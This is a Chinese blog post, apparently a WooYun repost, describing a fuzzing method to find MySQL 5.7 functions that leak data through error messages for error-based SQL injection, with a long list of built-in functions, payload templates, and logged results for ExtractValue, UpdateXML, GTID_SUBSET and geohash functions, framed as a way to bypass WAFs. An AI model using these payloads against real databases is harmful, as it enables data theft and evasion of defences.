正在阅读:

Mysql报错注入简单测试模型

5,603

测试Mysql环境:Mysql 5.7.12-log Mysql Community Server(GPL)

1、收集内置函数

http://dev.mysql.com/doc/refman/5.7/en/dynindex-function.html

2、整理列表


select ABS();
select ACOS();
select add();
select ADDDATE();
select addslashes();
select ADDTIME();
select AES_DECRYPT();
select AES_ENCRYPT();
select ANY_VALUE();
select Area();
select AsBinary();
select ASCII();
select ASIN();
select AsText();
select AsWKB();
select AsWKT();
select ASYMMETRIC_DECRYPT();
select ASYMMETRIC_DERIVE();
select ASYMMETRIC_ENCRYPT();
select ASYMMETRIC_SIGN();
select ASYMMETRIC_VERIFY();
select ATAN();
select ATAN2();
select AVG();
select BENCHMARK();
select BIN();
select BIT_AND();
select BIT_COUNT();
select BIT_LENGTH();
select BIT_OR();
select BIT_XOR();
select Buffer();
select CAST();
select CEIL();
select CEILING();
select Centroid();
select CHAR();
select CHAR_LENGTH();
select CHARACTER_LENGTH();
select CHARSET();
select E();
select COERCIBILITY();
select COLLATION();
select COMPRESS();
select CONCAT();
select CONCAT_WS();
select CONNECTION_ID();
select Contains();
select CONV();
select CONVERT();
select CONVERT_TZ();
select ConvexHull();
select COS();
select COT();
select COUNT();
select CRC32();
select CREATE_ASYMMETRIC_PRIV_KEY();
select CREATE_ASYMMETRIC_PUB_KEY();
select CREATE_DH_PARAMETERS();
select CREATE_DIGEST();
select Crosses();
select crypt();
select CURDATE();
select CURRENT_DATE();
select CURRENT_TIME();
select CURRENT_TIMESTAMP();
select CURRENT_USER();
select CURTIME();
select DATABASE();
select DATE();
select DATE_ADD();
select DATE_FORMAT();
select DATE_SUB();
select DATEDIFF();
select DAY();
select DAYNAME();
select DAYOFMONTH();
select DAYOFWEEK();
select DAYOFYEAR();
select DECODE();
select decr();
select DEFAULT();
select DEGREES();
select delete();
select DES_DECRYPT();
select DES_ENCRYPT();
select Dimension();
select Disjoint();
select Distance();
select ELT();
select ENCODE();
select ENCRYPT();
select EndPoint();
select Envelope();
select Equals();
select EXP();
select EXPORT_SET();
select expr IN ();
select expr NOT IN ();
select ExteriorRing();
select EXTRACT();
select ExtractValue();
select FIELD();
select FIND_IN_SET();
select FLOOR();
select FORMAT();
select FOUND_ROWS();
select FROM_BASE64();
select FROM_DAYS();
select FROM_UNIXTIME();
select GeomCollFromText();
select GeomCollFromWKB();
select GeometryCollection();
select GeometryCollectionFromText();
select GeometryCollectionFromWKB();
select GeometryFromText();
select GeometryFromWKB();
select GeometryN();
select GeometryType();
select GeomFromText();
select GeomFromWKB();
select get();
select GET_FORMAT();
select GET_LOCK();
select gethostbyaddr();
select gethostbyaddr_r();
select gethostbyname();
select gethostbyname_r();
select getrusage();
select gettimeofday();
select GLength();
select GREATEST();
select GROUP_CONCAT();
select GTID_SUBSET();
select GTID_SUBTRACT();
select HEX();
select HOUR();
select IF();
select IFNULL();
select IN();
select incr();
select INET6_ATON();
select INET6_NTOA();
select INET_ATON();
select INET_NTOA();
select INSERT();
select INSTR();
select InteriorRingN();
select Intersects();
select INTERVAL();
select IS_FREE_LOCK();
select IS_IPV4();
select IS_IPV4_COMPAT();
select IS_IPV4_MAPPED();
select IS_IPV6();
select IS_USED_LOCK();
select IsClosed();
select IsEmpty();
select ISNULL();
select IsSimple();
select JSON_APPEND();
select JSON_ARRAY();
select JSON_ARRAY_APPEND();
select JSON_ARRAY_INSERT();
select JSON_CONTAINS();
select JSON_CONTAINS_PATH();
select JSON_DEPTH();
select JSON_EXTRACT();
select JSON_INSERT();
select JSON_KEYS();
select JSON_LENGTH();
select JSON_MERGE();
select JSON_OBJECT();
select JSON_QUOTE();
select JSON_REMOVE();
select JSON_REPLACE();
select JSON_SEARCH();
select JSON_SET();
select JSON_TYPE();
select JSON_UNQUOTE();
select JSON_VALID();
select LAST_DAY();
select LAST_INSERT_ID();
select LCASE();
select LEAST();
select LEFT();
select LENGTH();
select Length();
select LineFromText();
select LineFromWKB();
select LineString();
select LineStringFromText();
select LineStringFromWKB();
select LN();
select LOAD_FILE();
select LOCALTIME();
select LOCALTIMESTAMP();
select LOCATE();
select LOG();
select LOG10();
select LOG2();
select LOWER();
select LPAD();
select LTRIM();
select MAKE_SET();
select MAKEDATE();
select MAKETIME();
select MASTER_POS_WAIT();
select MATCH();
select MAX();
select MBRContains();
select MBRCoveredBy();
select MBRCovers();
select MBRDisjoint();
select MBREqual();
select MBREquals();
select MBRIntersects();
select MBROverlaps();
select MBRTouches();
select MBRWithin();
select MD5();
select MICROSECOND();
select MID();
select MIN();
select MINUTE();
select MLineFromText();
select MLineFromWKB();
select MOD();
select MONTH();
select MONTHNAME();
select MPointFromText();
select MPointFromWKB();
select MPolyFromText();
select MPolyFromWKB();
select MultiLineString();
select MultiLineStringFromText();
select MultiLineStringFromWKB();
select MultiPoint();
select MultiPointFromText();
select MultiPointFromWKB();
select MultiPolygon();
select MultiPolygonFromText();
select MultiPolygonFromWKB();
select my_open();
select NAME_CONST();
select NOT IN();
select NOW();
select NULLIF();
select NumGeometries();
select NumInteriorRings();
select NumPoints();
select OCT();
select OCTET_LENGTH();
select OLD_PASSWORD();
select ORD();
select Overlaps();
select PASSWORD();
select PERIOD_ADD();
select PERIOD_DIFF();
select PI();
select Point();
select PointFromText();
select PointFromWKB();
select PointN();
select PolyFromText();
select PolyFromWKB();
select Polygon();
select PolygonFromText();
select PolygonFromWKB();
select POSITION();
select POW();
select POWER();
select pthread_mutex();
select QUARTER();
select QUOTE();
select RADIANS();
select RAND();
select RANDOM_BYTES();
select RELEASE_ALL_LOCKS();
select RELEASE_LOCK();
select REPEAT();
select REPLACE();
select replace();
select REVERSE();
select RIGHT();
select ROUND();
select ROW_COUNT();
select RPAD();
select RTRIM();
select SCHEMA();
select SEC_TO_TIME();
select SECOND();
select SESSION_USER();
select set();
select setrlimit();
select SHA();
select SHA1();
select SHA2();
select SIGN();
select SIN();
select SLEEP();
select SOUNDEX();
select SPACE();
select SQRT();
select SRID();
select ST_Area();
select ST_AsBinary();
select ST_AsGeoJSON();
select ST_AsText();
select ST_AsWKB();
select ST_AsWKT();
select ST_Buffer();
select ST_Buffer_Strategy();
select ST_Centroid();
select ST_Contains();
select ST_ConvexHull();
select ST_Crosses();
select ST_Difference();
select ST_Dimension();
select ST_Disjoint();
select ST_Distance();
select ST_Distance_Sphere();
select ST_EndPoint();
select ST_Envelope();
select ST_Equals();
select ST_ExteriorRing();
select ST_GeoHash();
select ST_GeomCollFromText();
select ST_GeomCollFromTxt();
select ST_GeomCollFromWKB();
select ST_GeometryCollectionFromText();
select ST_GeometryCollectionFromWKB();
select ST_GeometryFromText();
select ST_GeometryFromWKB();
select ST_GeometryN();
select ST_GeometryType();
select ST_GeomFromGeoJSON();
select ST_GeomFromText();
select ST_GeomFromWKB();
select ST_InteriorRingN();
select ST_Intersection();
select ST_Intersects();
select ST_IsClosed();
select ST_IsEmpty();
select ST_IsSimple();
select ST_IsValid();
select ST_LatFromGeoHash();
select ST_Length();
select ST_LineFromText();
select ST_LineFromWKB();
select ST_LineStringFromText();
select ST_LineStringFromWKB();
select ST_LongFromGeoHash();
select ST_MakeEnvelope();
select ST_MLineFromText();
select ST_MLineFromWKB();
select ST_MPointFromText();
ST_MPointFromWKB();
select ST_MPolyFromText();
select ST_MPolyFromWKB();
select ST_MultiLineStringFromText();
select ST_MultiLineStringFromWKB();
select ST_MultiPointFromText();
select ST_MultiPointFromWKB();
select ST_MultiPolygonFromText();
select ST_MultiPolygonFromWKB();
select ST_NumGeometries();
select ST_NumInteriorRing();
select ST_NumInteriorRings();
select ST_NumPoints();
select ST_Overlaps();
select ST_PointFromGeoHash();
select ST_PointFromText();
select ST_PointFromWKB();
select ST_PointN();
select ST_PolyFromText();
select ST_PolyFromWKB();
select ST_PolygonFromText();
select ST_PolygonFromWKB();
select ST_Simplify();
select ST_SRID();
select ST_StartPoint();
select ST_SymDifference();
select ST_Touches();
select ST_Union();
select ST_Validate();
select ST_Within();
select ST_X();
select ST_Y();
select StartPoint();
select STD();
select STDDEV();
select STDDEV_POP();
select STDDEV_SAMP();
select STR_TO_DATE();
select STRCMP();
select SUBDATE();
select SUBSTR();
select SUBSTRING();
select SUBSTRING_INDEX();
select SUBTIME();
select SUM();
select SYSDATE();
select SYSTEM_USER();
select TAN();
select TIME();
select TIME_FORMAT();
select TIME_TO_SEC();
select TIMEDIFF();
select TIMESTAMP();
select TIMESTAMPADD();
select TIMESTAMPDIFF();
select TO_BASE64();
select TO_DAYS();
select TO_SECONDS();
select Touches();
select TRIM();
select TRUNCATE();
select UCASE();
select UNCOMPRESS();
select UNCOMPRESSED_LENGTH();
select UNHEX();
select UNIX_TIMESTAMP();
select UpdateXML();
select UPPER();
select USER();
select UTC_DATE();
select UTC_TIME();
select UTC_TIMESTAMP();
select UUID();
select UUID_SHORT();
select VALIDATE_PASSWORD_STRENGTH();
select VALUES();
select VAR_POP();
select VAR_SAMP();
select VARIANCE();
select VERSION();
select WAIT_FOR_EXECUTED_GTID_SET();
select WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS();
select WEEK();
select WEEKDAY();
select WEEKOFYEAR();
select WEIGHT_STRING();
select Within();
select X();
select Y();
select YEAR();
select YEARWEEK();

3、构造测试模型


select functionname(version());
select functionname(1,version());
select functionname(version(),1);
select functionname(version(),1,1);
select functionname(1,version(),1);
select functionname(version(),1,1);

4、在mysql command line设置log输出位置

tee Y:/sqllog.txt

5、将3中的模型通过replace的方式放到2中列表里,直接将结果粘贴到command line里。

由于列表中包含换行字符sql语句将会依次执行。

6、以-log为关键字通过log文件整理有效的报错注入结果:

mysql> select ST_LatFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LATFROMGEOHASH
mysql> select ST_LongFromGeoHash(version());
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function ST_LONGFROMGEOHASH
mysql> select ExtractValue(1,version());
ERROR 1105 (HY000): XPATH syntax error: '.12-log'
mysql> select GTID_SUBSET(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select GTID_SUBTRACT(version(),1);
ERROR 1772 (HY000): Malformed GTID set specification '5.7.12-log'.
mysql> select ST_PointFromGeoHash(version(),1);
ERROR 1411 (HY000): Incorrect geohash value: '5.7.12-log' for function st_pointfromgeohash
mysql> select UpdateXML(1,version(),1);
ERROR 1105 (HY000): XPATH syntax error: '.12-log'

感觉还不错。回头慢慢加大测试pattern看能不能得到更多有趣的结果。

这个如果详细测试出来结果,很多waf又可以被绕过了。

原文地址:

http://zone.wooyun.org/content/26631

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌